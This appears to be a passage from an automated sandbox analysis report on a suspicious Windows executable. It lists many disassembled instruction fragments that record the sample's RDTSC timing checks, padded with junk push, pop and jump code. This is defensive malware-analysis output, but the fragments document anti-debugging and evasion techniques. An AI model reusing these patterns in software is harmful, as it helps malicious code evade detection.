Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA5511 second address: FA5530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8E2D690EF2h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA5530 second address: FA5534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA566B second address: FA567C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F8E2D690EEBh 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FA567C second address: FA56A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F8E2D68FC56h 0x0000000f jmp 00007F8E2D68FC62h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB25E4 second address: FB25E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB0BF8 second address: FB0C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC63h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB0EC3 second address: FB0ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E2D690EECh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB0ECF second address: FB0ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB1252 second address: FB128B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8E2D690EF0h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8E2D690EF5h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 jo 00007F8E2D690EE6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB140E second address: FB142A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB142A second address: FB1480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8E2D690EF8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8E2D690EF8h 0x0000001a ja 00007F8E2D690EE6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB1480 second address: FB1484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB1CED second address: FB1CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8E2D690EE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB1CF7 second address: FB1D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F8E2D68FC63h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F8E2D68FC58h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01A8 second address: FB01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01AD second address: FB01B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01B2 second address: FB01EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F8E2D690EEBh 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F8E2D690EF9h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01EA second address: FB01F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB01F1 second address: FB01FD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E2D690EEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB882F second address: FB8837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB8837 second address: FB883D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB883D second address: FB8842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB8842 second address: FB884C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8E2D690EEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB884C second address: FB885A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB885A second address: FB887B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8E2D690EE6h 0x0000000e jmp 00007F8E2D690EF3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB887B second address: FB8881 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FB8881 second address: FB8887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FC5859 second address: FC5867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FC5867 second address: FC5881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FC854E second address: FC8552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD712B second address: FD7137 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnp 00007F8E2D690EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD7137 second address: FD7150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD7150 second address: FD7161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E2D690EEBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD907D second address: FD908E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F8E2D68FC56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD8EC7 second address: FD8EDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8E2D690EEAh 0x00000008 jnc 00007F8E2D690EE6h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FD8EDE second address: FD8F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 jmp 00007F8E2D68FC5Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F8E2D68FC58h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FDB422 second address: FDB428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FDB428 second address: FDB42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FDD78A second address: FDD790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE3B9E second address: FE3BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE25F5 second address: FE2616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF3h 0x00000007 jp 00007F8E2D690EE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE2616 second address: FE262E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE2F4B second address: FE2F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE747A second address: FE7491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F8E2D68FC62h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE7491 second address: FE74AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE74AF second address: FE74B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE74B3 second address: FE74B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FE74B7 second address: FE74BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEAAC1 second address: FEAB00 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8E2D690F05h 0x00000008 jnl 00007F8E2D690EE6h 0x0000000e jmp 00007F8E2D690EF9h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8E2D690EF0h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEAB00 second address: FEAB04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEAB04 second address: FEAB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EEBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F8E2D690EEEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEAB1D second address: FEAB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEACAD second address: FEACB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: FEACB7 second address: FEACE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8E2D68FC66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 102A820 second address: 102A83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F8E2D690EE6h 0x0000000d jmp 00007F8E2D690EF0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 102CDC2 second address: 102CDF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8E2D68FC60h 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F8E2D68FC64h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 102E3DD second address: 102E404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D690EEEh 0x00000009 popad 0x0000000a jno 00007F8E2D690EF4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 102E404 second address: 102E415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1024BCF second address: 1024BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BD94 second address: 103BDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jo 00007F8E2D68FC56h 0x00000011 jl 00007F8E2D68FC56h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BDB2 second address: 103BDBC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8E2D690EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BDBC second address: 103BDC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BDC2 second address: 103BDD1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8E2D690EE6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BDD1 second address: 103BDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC5Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BEE7 second address: 103BF09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E2D690EEDh 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jne 00007F8E2D690EE6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 103BF09 second address: 103BF19 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8E2D68FC56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11003F3 second address: 1100402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100402 second address: 1100406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100406 second address: 110042A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F8E2D690EEAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8E2D690EF2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100863 second address: 1100867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100867 second address: 11008C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E2D690EEBh 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F8E2D690EF4h 0x00000016 jmp 00007F8E2D690EEFh 0x0000001b pushad 0x0000001c jmp 00007F8E2D690EF6h 0x00000021 jmp 00007F8E2D690EEAh 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100A42 second address: 1100A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E2D68FC67h 0x00000009 jmp 00007F8E2D68FC5Fh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100DBA second address: 1100DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEDh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100EE4 second address: 1100EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F8E2D68FC56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100EF7 second address: 1100F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F8E2D690EEEh 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100F0D second address: 1100F28 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8E2D68FC65h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1100F28 second address: 1100F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029A6 second address: 11029AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029AB second address: 11029B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029B7 second address: 11029C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8E2D68FC56h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029C2 second address: 11029C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029C8 second address: 11029CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 11029CE second address: 11029D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106B8B second address: 1106BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106BA5 second address: 1106BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8E2D690EF3h 0x0000000f nop 0x00000010 mov edx, dword ptr [ebp+122D1BE1h] 0x00000016 push 00000004h 0x00000018 mov edx, 61E5ED7Fh 0x0000001d call 00007F8E2D690EE9h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8E2D690EEDh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106BF7 second address: 1106C09 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8E2D68FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8E2D68FC56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106C09 second address: 1106C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 1106C0D second address: 1106C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 jc 00007F8E2D68FC58h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jng 00007F8E2D68FC6Ch 0x0000001c jmp 00007F8E2D68FC66h 0x00000021 mov eax, dword ptr [eax] 0x00000023 jbe 00007F8E2D68FC64h 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007F8E2D68FC56h 0x00000031 rdtsc
